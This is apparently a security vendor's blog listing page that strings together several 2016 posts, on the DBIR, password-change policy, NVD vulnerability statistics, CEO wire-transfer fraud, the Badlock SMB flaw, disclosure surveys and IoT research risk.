"Threat intelligence" was a noticeably absent topic in the 2016 DBIR, but we feel that it can play a key role when it comes to defending your organization when vulnerabilities are present. Your vuln management, server/app management, and security operations teams should be working in tandem to know where vulnerabilities still exist and to monitor and block malicious activity that is associated with targets that are still vulnerable. This is one of the best ways to utilize all those threat intel feeds you have gathering dust in your SIEM.


There and Back Again


This post outlined just a few of the interesting markers on your path through the Verizon Data Breach Report. Keep a watchful eye on the Rapid7 Community for more insight into other critical areas of the report and where we can help you address the key issues facing your organization.

(Many thanks to Rapid7's Roy Hodgman and Rebekah Brown for their contributions to this post.)


Related Resources:


Watch my short take on this year's Verizon Data Breach Investigations Report.


DBIR video.png

Join us for a live webcast as we dig deeper into the 2016 Verizon Data Breach Investigations Report findings. Tuesday, May 10 at 2PM ET/11AM PT. Register now!

This is a guest post from our frequent contributor Kevin Beaver. You can read all of his previous guest posts here.


I'm often asked by friends and colleagues: Why do I have to change my password every 30 or 60 days? My response is always the same: Odds are good that it’s because that's the way that it's always been done. Or, these people might have a super strict IT manager who likes to show - on paper - that his or her environment is "locked down." Occasionally I will get feedback that auditors require such stringent settings. The funny thing is, there's never really a good business reason behind such short-term password changes.


In fact, if you dig in further, in many cases there are numerous other issues that are a much higher risk than passwords that are not changed often. I often see weak password requirements – i.e. complexity not being enforced or 6-character minimum lengths. I often see this combined with super weak endpoint security such as minimal Windows patching, no third-party software patching, no full disk encryption, and network monitoring/alerting that is reactive at best.

So, why is it that we go with the 30, 60, or 90-day password change requirements? I don't think it's malicious but I do believe that people just aren't taking the time to think about what they're doing. In fact that's sort of the essence of many security challenges that businesses face today. People just aren’t thinking about what they're actually doing. They're going through the motions with their “policies” and they have these fancy technologies deployed but, in reality, the implementation of everything stinks. At the end of the day, management assumes that all is well because of all of the money and effort being spent on these issues (including those pesky password changes) but, yet, they still get hit with breaches and no one can figure out why.


I think many seasoned IT and security professionals would agree with me in that quick turnarounds on password changes is actually bad for security. We always joke about how users will write down their passwords on the sticky notes – and it's true! But it goes deeper than the humor. There's a strong political factor at the root of much of the password nonsense. Users don't want to have to create and remember long passwords.


After all, odds are they’ve never been taught/guided to use passphrases that are super simple to create and remember yet impossible to crack. Furthermore, management doesn't want to hear about it so IT doesn't press the issue. Thus the ignorant cycle of if we can't make them use strong passphrases, we can at least require quick password changes. The madness continues and it’s bad for business.


Anytime you create complexity and, in this case, requiring users to continually change their passwords – whether or not they’re suspected to have been compromised – you create more problems than you solve in most cases. There are always exceptions and compensating controls such as intruder lockout, two-factor authentication, and proactive system monitoring can thwart most attacks on user accounts. It’s time to look past the nonsense and capitalize on opportunities such as this to get people on our side rather than continue ticking them off.

This is a guest post by Ismail Guneydas. Ismail Guneydas is senior technical leader with over ten years of experience in vulnerability management, digital forensics, e-Crime investigations and teaching. Currently he is a senior vulnerability manager at Kimberly-Clark and an adjunct faculty at Texas A&M. He has M.S.  in computer science and MBA degrees.


2015 is in the past, so now is as good a time as any to get some numbers together from the year that was and analyze them.  For this blog post, we're going to use the numbers from the National Vulnerability Database and take a look at what trends these numbers reveal.


Why the National Vulnerability Database (NVD)?  To paraphrase Wikipedia for a moment, it's a repository of vulnerability management data, assembled by the U.S. Government, represented using the Security Content Automation Protocol (SCAP). Most relevant to our exercise here, the NVD includes databases of security-related software flaws, misconfigurations, product names, impact metrics—amongst other data fields.

By pouring through the NVD data from the last 5 years, we're looking to answer following questions:

  • What are the vulnerability trends of the last 5 years, and do vulnerability numbers indicate anything specific?
  • What are the severities of vulnerabilities? Do we have more critical vulnerabilities or less?
  • What vendors create most vulnerable products?
  • What products are most vulnerable?
    • Which OS? Windows OSX, a Linux distro?
    • Which mobile OS? IOS, Android, Windows?
    • Which web browser? Safari, Internet Explorer, Firefox?


Vulnerabilities Per Year



That is correct! Believe it or not, there was a 20% drop in the number of vulnerabilities compared to the number of vulnerabilities in 2014. However, if you look at the overall trending growth in the last 5 years, the 2015 number seems to be consistent with the overall growth rate. The abnormality here was the 53% increase in 2014. If we compare 2015's numbers with 2013, then we see  24% increase.


All in all though, this doesn't mean we didn't have an especially bad year as we did in 2014 (the trend shows us we will have more vulnerabilities in the next few years as well). That's because when we look closely at the critical vulnerabilities, we see something interesting. There were more critical vulnerabilities in 2015 then 2014. In 2014 we had more vulnerabilities with CVSS 4, 5, and 6; however, 2015 had more vulnerabilities with CVSS 7, 8, 9 and 10!



As you see above there are 3376 critical vulnerabilities in 2015 where as there were only 2887 critical vulnerabilities in 2014. (That is a 17% increase.)


In other words, the proportion of critical vulnerabilities is increasing overall. That means we need to pay close attention to our vulnerability management programs and make sure they are effective—fewer false positives and negatives—up-to-date with recent vulnerabilities, and faster with shorter scan times.


Severity of Vulnerabilities

This chart shows weight distribution of 2015 vulnerabilities, based on CVSS score. As (hopefully) most of you know, 10 is the highest/most critical level, whereas 1 is the least critical level.



There are many vulnerabilities with CVSS 9 and 10. Let's check following graph that gives more clear picture:



This means 36% of the vulnerabilities were critical (CVSS >=7). The average CVSS is 6.8 so that is at the boundary to be critical.


The severity of vulns is increasing, but this isn’t to say it’s all bad. In fact, it really exposes a crucial point: That you have to be deploying a vulnerability management program that separates the weak from the chaff. Effective vulnerability management program will help you to find and then remediate vulnerabilities in your environment.


Vulnerability Numbers Per Vendor

Let's analyze national vulnerability database numbers by checking vendors' vulnerabilities. The shifting tides in vulnerabilities doesn’t stop for any company, including Apple. The fact is there are always vulnerabilities, the key has to be detecting these before they are exploited.


Apple had the most number of vulnerabilities in 2015.  Of course with many iOS and OSX vulnerabilities out there in general, it's no surprise this number went up.


Here is the full list:



Apple jumped from being number 5th in 2014.  Microsoft was number 3rd and Cisco was number 4th. Surprisingly Oracle (owner of Java) did well this year and took 4th place (they were number 2 last year). Congratulations (?) to Canonical and Novel, as they were not in top 10 list last year (they were 13rd and 15th).  So in terms of prioritization, with Apple making a big jump last year, if you have a lot of iOS in your environment, it's definitely time to  make sure you've prioritized those assets accordingly.


Here's a comparison chart that shows number of vulnerabilities per vendor for 2014 and 2015.



Vulnerabilities Per OS

In 2015, according to the NVD, OSX had the most vulnerabilities, followed by Windows 2012 and Ubuntu Linux.



Here most vulnerable Linux distro is Ubuntu. Opensuse is the runner up and then Debian Linux. Interestingly Windows 7, the most popular desktop application based on its usage, is reported to be less vulnerable then Ubuntu. (That may surprise a few people!)


Vulnerabilities Per Mobile OS



IPhone OS has the highest number of vulnerabilities published in 2015. Windows and Android came after iPhone. 2014 was no different. iPhone OS had the highest number of vulnerabilities and Windows Rt and Android followed it.


Vulnerabilities Per Application


Vulnerabilities Per Browser


IE had highest number of vulnerabilities in 2015. In 2014, the order of product with the highest number of vulnerabilities were exactly same. (IE, Chrome, Firefox, Safari.)



Given the trends over the past few years reported via the NVD, we should expect more vulnerabilities to be published with higher CVSS score this year. Moreover, I predict that mobile OS will be hot area for security — as more mobile security professionals find and report mobile OS vulnerabilities, we'll see an increase in Mobile OS vulnerabilities as well.


It’s all about priorities. We only have so many hours in the day and resources available to us to remediate what we can. But if you take intel from something like the NVD and layer that over the visibility you have into your own environment, you can use this information to help build a good to-do list built by priorities, and not fear.

The FBI this week posted an alert that showed wire transfer scams bled $2.3 Billion from “business email compromise” from October 2013 through February 2016.  A couple of news outlets picked this up, including Brian Krebs.


When I was the head of security at a multi-national corporation, this was an issue that came up regularly. There were instances of very aggressive behavior, such as someone calling the call center pretending to be the CEO of one of the countries and demanding a $1 million dollar transfer. That was a very bold and very obvious fraud that the call center was able to handle. However, very often these requests came though email, just like the FBI reported.


When this happens, normally the scammer uses either a forged email domain very similar to the corporate one. If your user uses a browser without a fixed width font, they might get tricked into see the domain as legitimate, i.e. vs (look closely), or a use of a sub domain that looks very similar, i.e. Then the header is simply forged. In simple mail clients, like Gmail, you have to take extra steps to see the actual sender domain.



The emails are usually pretty short, lacking detail, such as :


“I need you to immediately produce a wire transfer for $13,000 and sent to the bank listed. I will follow up with you later.





And you might have a pdf attachment with banking details. Oddly enough, the PDFs I encountered were never malicious. They had legitimate account details so the wire transfers could be received.


Now you might think this is too simple and shouldn’t work. But obviously, it does, to the tune of $2.3 billion. You might ask yourself why, and if you aren’t, I’ll ask it for you. Self, why does this work?


Well consider that you might have a multibillion dollar corporation located in many countries. If you do business in certain countries, wire transfers are the norm. So wire transfers become part of a normal process for that company. And when someone asks for $13,000, or even as much as $75,000, for a company that posts $4.3 billion in revenue, they would not even blink an eye at this.


Scammers do a little recon, ask for an amount that is small to the company, and it gets processed. Little risk, high reward.

How would you protect against this?


The simplest method is verification of the request. The FBI suggests that a telephone call be placed to verify the request, which is a good practice. They also suggest two factor authentication for email, and limit social media activities, as scammers will do reconnaissance and determine if CEOs are traveling.


Krebs points out that some experts rely on technological controls such as DKIM and SPF. While these are things we recommend in our consultancy, they are complex for low maturity organizations and do require some effort and support. At the end of the day, they don’t actually solve the problem, because we are socially engineering human beings.


While all of these technology controls are good, we are dealing with humans. The best way to prevent this fraud from occurring is creating simple business processes that are enforced. In security terms, we would call this segregation of duties.


The simplest security


Simply put, segregation of duties says that no one person or one role should be allowed to execute a business process from start to finish. In the case of wire transfer fraud, for example, one person/role should not be able to create the wire transfer, approve it and execute it. Dividing these duties between two or more persons/roles means more eyes on the situation, and a potential to catch the fraud. A simple process map might look like:



Ensure that Role A and Role B have proper documentation (evidence) for each step of the request and approval, and you now have a specific security control that easily integrates into a business process. The key to enforcement: making sure every single request follows the chain every single time. No exceptions.


Now let me tell you about the one that almost made it.


There was one instance I dealt with which was one mouse click away from being executed.


An email (very similar to the example above) was sent to a director of finance, purportedly from the CEO. The director was busy that day, and filed the email away for processing later. By 4:55 pm or so, they realized they had not acted on the request. As it was almost end of day, and wire transfers are not processed by most banks after banking hours, she hurriedly forwarded the email to the wire transfer processor, marked with urgency, and made a call to ensure it was processed immediately. By the time it was picked up and put into the process, banks were closed. So they agreed it would execute first thing tomorrow morning.


That evening, a series of emails went back and forth between the approver, who was a simple finance analyst who held very firm to the process, and the requester. Though it had urgency, and people were shouting that it was a request from the CEO, the process prevailed.


All this time no one thought to actually verify the request, and this was not part of the process at that time. But because the approver was uncooperative with the request, it was escalated to the CFO, because the CEO was traveling, and he suspected it was fraudulent, and contacted me. We determined almost immediately it was fake, just by looking at email headers. There were other indicators too.


I immediately praised everyone involved, and bought them gifts for sticking to the process. The director might have felt ashamed, but I went to her as well and explained that these scams are successful because they count on stress and distraction to occur. These are normal human behaviors, and they sometimes cause us to act erratically. But because we had a firm process that was adhered to, all we lost was time.


There’s actually much more to this story, but I’ll save that for future posts.


Regardless of your organizations size or structure, you too can put this in place. If you are unsure these processes exist, start asking around. Begin with your controllers or comptrollers, or anyone in finance. Ask if you have a process for wire transfers, and if so what the process is. Get involved, understand how your business does business. This will benefit you in many ways.


Other things you can do:


  • Join Infragard, the FBI and civilian alliance, which will get you in depth resources and information. You can also report fraud to the IC3, The Internet Crime Complaint Center.
  • Ensure you have a separation of duties policy that is enforced
  • Periodically train / update awareness of these issues with the people involved


All these are free, requiring only a time investment, and will go a long way toward avoiding the kind of wire transfer fraud scam the FBI is warning about.

Today is Badlock Day

badlock-not-really.JPGYou may recall that the folks over at stated about 20 days ago that April 12 would see patches for "Badlock," a serious vulnerability in the SMB/CIFS protocol that affects both Microsoft Windows and any server running Samba, an open source workalike for SMB/CIFS services. We talked about it back in our Getting Ahead of Badlock post, and hopefully, IT administrators have taken advantage of the pre-release warning to clear their schedules for today's patching activities.


For Microsoft shops, this should have been straightforward, since today is also Microsoft Patch Tuesday. Applying critical Microsoft patches is, after all, a pretty predictable event.


For administrators of servers that run other operating systems that also happen to offer Samba, we've all had a rough couple years of (usually) coordinated disclosures and updates around core system libraries, so this event can piggyback on those established procedures.


How worried should I be?

While we do recommend you roll out the patches as soon as possible - as we generally do for everything - we don't think Badlock is the Bug To End All Bugs[TM]. In reality, an attacker has to already be in a position to do harm in order to use this, and if they are, there are probably other, worse (or better depending on your point of view) attacks they may leverage.


Badlock describes a Man-in-the-Middle (MitM) vulnerability affecting both Samba's implementation of SMB/CIFS (as CVE-2016-2118) and Microsoft's (as CVE-2016-0128). This is NOT a straightforward remote code execution (RCE) vulnerability, so it is unlike MS08-067 or any of the historical RCE issues against SMB/CIFS. More details about Badlock and the related issues can be found over at


The most likely attack scenario is an internal user who is in the position of intercepting and modifying network traffic in transit to gain privileges equivalent to the intercepted user. While some SMB/CIFS servers exist on the Internet, this is generally considered poor practice, and should be avoided anyway.


What's next?

For Samba administrators, the easy advice is to just patch up now. If you're absolutely sure you're not offering CIFS/SMB over the Internet with Samba, check again. Unintentionally exposed services are the bane of IT security after all, with the porous nature of network perimeters.


While you're checking, go ahead and patch, since both private and public exploits will surface eventually. You can bet that exploit developers around the world are poring over the Samba patches now. In fact, you can track public progress over at the Metasploit Pull Request queue, but please keep your comments technically relevant and helpful if you care to pitch in.


For Microsoft Windows administrators, Badlock is apparently fixed in MS16-047. While Microsoft merely rates this as "Important," there are plenty of other critically rated issues released today, so IT organizations are advised to use their already-negotiated change windows to test and apply this latest round of patches.


Rapid7 will be publishing both Metasploit exploits and Nexpose checks just as soon as we can, and this post will be updated when those are available. These should help IT security practitioners to identify their organizations' threat exposure on both systems that are routinely kept up to date, as well as those systems that are IT's responsibility but are, for whatever reason, outside of IT's direct control.


Are any Rapid7 products affected?

No Rapid7 products are affected by this vulnerability.

Maybe I’m being cynical, but I feel like that may well be the thought that a lot of people have when they hear about two surveys posted online this week to investigate perspectives on vulnerability disclosure and handling. Yet despite my natural cynicism, I believe these surveys are a valuable and important step towards understanding the real status quo around vulnerability disclosure and handling so the actions taken to drive adoption of best practices will be more likely to have impact.


Hopefully this blog will explain why I feel this way. Before we get into it, here are the surveys:


A little bit of background…


In March 2015, the National Telecommunications and Information Administration (NTIA) issued a request for comment to “identify substantive cybersecurity issues that affect the digital ecosystem and digital economic growth where broad consensus, coordinated action, and the development of best practices could substantially improve security for organizations and consumers.” Based on the responses they received, they then announced that they were convening a “multistakeholder process concerning collaboration between security researchers and software and system developers and owners to address security vulnerability disclosure.”


This announcement was met by the deafening sound of groaning from the security community, many of whom have already participated in countless multistakeholder processes on this topic. The debate around vulnerability disclosure and handling is not new, and it has a tendency to veer towards the religious, with security researchers on one side, and technology providers on the other. Despite this, there have been a number of good faith efforts to develop best practices so researchers and technology providers can work more productively together, reducing the risk on both sides, as well as for end-users. This work has even resulted in two ISO standards (ISO 29147 & ISO 30111) providing vulnerability disclosure and handling best practices for technology providers and operators. So why did the NTIA receive comments proposing this topic?  And of all the things proposed, why did they pick this as their first topic?


In my opinion, it’s for two main, connected reasons.


Firstly, despite all the phenomenal work that has gone into developing best practices for vulnerability disclosure and handling, adoption of these practices is still very limited. Rapid7 conducts quite a lot of vulnerability disclosures, either for our own researchers, or on occasion for researchers in the Metasploit community that don’t want to deal with the hassle.  Anecdotally, we reckon we receive a response to these disclosures maybe 20% of the time. The rest of the time, it’s crickets. In fact, at the first meeting of the NTIA process in Berkeley, Art Manion of the CERT Coordination Center commented that they’ve taken to sending registered snail mail as it’s the only way they can be sure a disclosure has been received.  It was hard to tell if that’s a joke or true facts.


So adoption still seems to be a challenge, and maybe some people (like me) hope this process can help. Of course, the efforts that went before tried to drive adoption, so why should this one be any different?


This brings me to the second of my reasons for this project, namely that the times have changed, and with them the context. In the past five years, we’ve seen a staggering number of breaches reported in the news; we’ve seen high-profile branded vulnerability disclosures dominate headlines and put security on the executive team’s radar. We’ve seen bug bounties starting to be adopted by the more security-minded companies. And importantly, we’ve seen the Government start to pay attention to security research – we’ve seen that in the DMCA exemption recently approved, the FDA post-market guidance being proposed, the FTC’s presence at DEF CON, the Department of Defense’s bug bounty, and of course, in the very fact that the NTIA picked this topic. None of these factors alone creates a turn of the tide, but combined, they just might provide an opportunity for us to take a step forward.


And that’s what we’re talking about here – steps. It’s important to remember that complex problems are almost never solved overnight. The work done in this NTIA process builds on work conducted before: for example the development of best practices; the disclosure of vulnerability research; efforts to address or fix those bugs; the adoption of bug bounties. All of these pieces make up a picture that reveals a gradual shift in the culture around vulnerability disclosure and handling. Our efforts, should they yield results, will also not be a panacea, but we hope they will pave the way for other steps forward in the future.


OK, but why do we need surveys?


As I said above, discussions around this tend to become a little heated, and there’s not always a lot of empathy between the two sides, which doesn’t make for great potential for finding resolution. A lot of this dialogue is fueled by assumptions.

My experience and resulting perspective on this topic stems from having worked on both sides of the fence – first as a reputation manager for tech companies (where my reaction to a vulnerability disclosure would have been to try to kill it with fire); and then more recently I have partnered with researchers to get the word out about vulnerabilities, or have coordinated Rapid7’s efforts to respond to major disclosures in the community. At different points I have responded with indignation on behalf of my tech company client, who I saw as being threatened by those Shady Researcher Types, and then later on behalf of my researcher friends, who I have seen threatened by those Evil Corporation Types. I say that somewhat tongue-in-cheek, but I do often hear that kind of dialogue coming from the different groups involved, and much worse besides. There are a lot of stereotypes and assumptions in this discussion, and I find they are rarely all that true.


I thought my experience gave me a pretty good handle on the debate and the various points of view I would encounter. I thought I knew the reality behind the hyperbolic discourse, yet I find I am still surprised by the things I hear.


For example, it turns out a lot of technology providers (both big and small) don’t think of themselves as such and so they are in the “don’t know what they don’t know” bucket. It also turns out a lot of technology operators are terrified of being extorted by researchers. I’ve been told that a few times, but had initially dismissed it as hyperbole, until an incredibly stressed security professional working at a non-profit and trying to figure out how to interpret an inbound from a researcher contacted me asking for help. When I looked at the communication from the researcher, I could absolutely understand his concern.


On the researcher side, I’ve been saddened by the number of people that tell me they don’t want to disclose findings because they’re afraid of legal threats from the vendor. Yet more have told me they see no point in disclosing to vendors because they never respond.  As I said above, we can relate to that point of view! At the same time, we recently disclosed a vulnerability to Xfinity, and missed disclosing through their preferred reporting route (we disclosed to Xfinity addresses, and their recommendation is to use  When we went public, they pointed this out, and were actually very responsive and engaged regarding the disclosure. We realized that we’ve become so used to a lack of response from vendors that we stopped pushing ourselves to do everything we can to get one. If we care about reaching the right outcome to improve security – and we do – we can’t allow ourselves to become defeatist.


My point here is that assumptions may be based on past experience, but that doesn’t mean they are always correct, or even still correct in the current context. Assumptions, particularly erroneous ones, undermine our ability to understand the heart of the problem, which reduces our chances of proposing solutions that will work. Assumptions and stereotypes are also clear signs of a lack of empathy. How will we ever achieve any kind of productive collaboration, compromise, or cultural evolution if we aren’t able or willing to empathize with each other?  I rarely find that anyone is motivated by purely nefarious motives, and understanding what actually does motivate them and why is the key to informing and influencing behavior to effect positive change.  Even if in some instances it means that it’s your own behavior that might change J


So, about those surveys…


The group that developed the surveys – the Awareness and Adoption Group participating in the NTIA process (not NTIA itself) – is comprised of a mixture of security researchers, technology providers, civil liberties advocates, policy makers, and vulnerability disclosure veterans and participants. It’s a pretty mixed group and it’s unlikely we all have the same goals or priorities in participating, but I’ve been very impressed and grateful that everyone has made a real effort to listen to each other and understand each other’s points of view. Our goal with the surveys is to do that on a far bigger scale so we can really understand a lot more about how people think about this topic. Ideally we will see responses from technology providers and operators, and security researchers that would not normally participate in something like the NTIA process as they are the vast majority and we want to understand their (your?!) perspectives. We’re hoping you can help us defeat any assumptions we may have - the only hypothesis we hope to prove out here is that we don’t know everything and can still learn.


So please do take the survey that relates to you, and please do share them and encourage others to do likewise:


Thank you!


Recently I transitioned from a Principal Consultant role into a new role at Rapid7, as Research Lead with a focus on IoT technology, and it has been a fascinating challenge. Although I have been conducting research for a number of years, covering everything from Format string and Buffer overflow research on Windows applications to exploring embedded appliance and hacking multifunction printers (MFP), conducting research within the IoT world is truly exciting and amazing and has taught me to be even more open minded.


That is, open minded to the fact that there are people out there attaching technology to everything and anything. (Even toothbrushes.)




As a security consultant, over the last eight years I have focused most of my research on operational style attacks, which I have developed and used to compromise systems and data during penetration testing. The concept of operational attacks is the process of using the operational features of a device against itself.


As an example, if you know how to ask nicely, MFPs will often give up Active Directory credentials, or as recent research has disclosed, network management systems openly consume SNMP data without questioning its content or where it came from.


IoT research is even cooler because now I get the chance to expand my experience into a number of new avenues. Historically I have prided myself in the ability to define risk around my research and communicate it well. With IoT, I initially shuddered at the question: “How do I define Risk?"


IoT Risk

In the past, it has been fairly simple to define and explain risk as it relates to operational style attacks within an enterprise environment, but with IoT technology I initially struggled with the concept of risk. This was mainly driven by the fact that most IoT technologies appear to be consumer-grade products. So if someone hacks my toothbrush they may learn how often I brush my teeth. What is the risk there, and how do I measure that risk?


The truth is, the deeper I head down this rabbit hole called IoT, the better my understanding of risk grows. A prime example of defining such risk was pointed out by Tod Beardsley in his blog “The Business Impact of Hacked Baby Monitors”. On the first look, we might easily jump to the conclusion that there may not be any serious risk to an enterprise business. But on second take, if a malicious actor can use some innocuous IoT technology to gain a foothold to the home network of one of your employees, they could then potentially pivot onto the corporate network via remote access, such a VPN. This is a valid risk that can be communicated and should be seriously considered.


IoT Research

To better define risk, we need to ensure our research involves all aspect of IoT technology. Often when researching and testing IoT, researchers can get a form of tunnel vision where they focus on the technology from a single point of reference, as an example, the device itself.


While working and discussing IoT technology with my peers at Rapid7, I have grown to appreciate the complexity of IoT and its ecosystem. Yes, ecosystem—this is where we consider the entire security picture of IoT, and not just one facet of the technology. This includes the three following categories and how each one of these categories interacts and impacts each of the other categories. We cannot test one without the other and consider that testing effective.  We must test each one and also test how they affect each other.




With IoT quickly becoming more than just consumer-grade products, we are starting to see more IoT-based technologies migrating into the enterprise environment. If we are ever going to build a secure IoT world, it is critical during our research that all aspects of the ecosystem are addressed.


The knowledge we learn from this research can help enterprises better cope with the new security risk, make better decisions on technology purchases, and help employees stay safe within their home environment—which leads to better security for our enterprises. Thorough research can also deliver valuable knowledge back to the vendors, making it possible to improve product security during the design, creation, and manufacturing of IoT technology, so new vendors and new products are not recreating the same issues over and over.


So, as we continue down the road of IoT research, let us focus our efforts on the entire ecosystem. That way we can assure that our efforts lead to a complete picture and culminate in security improvements within the IoT industry.

Filter Blog

By date: By tag: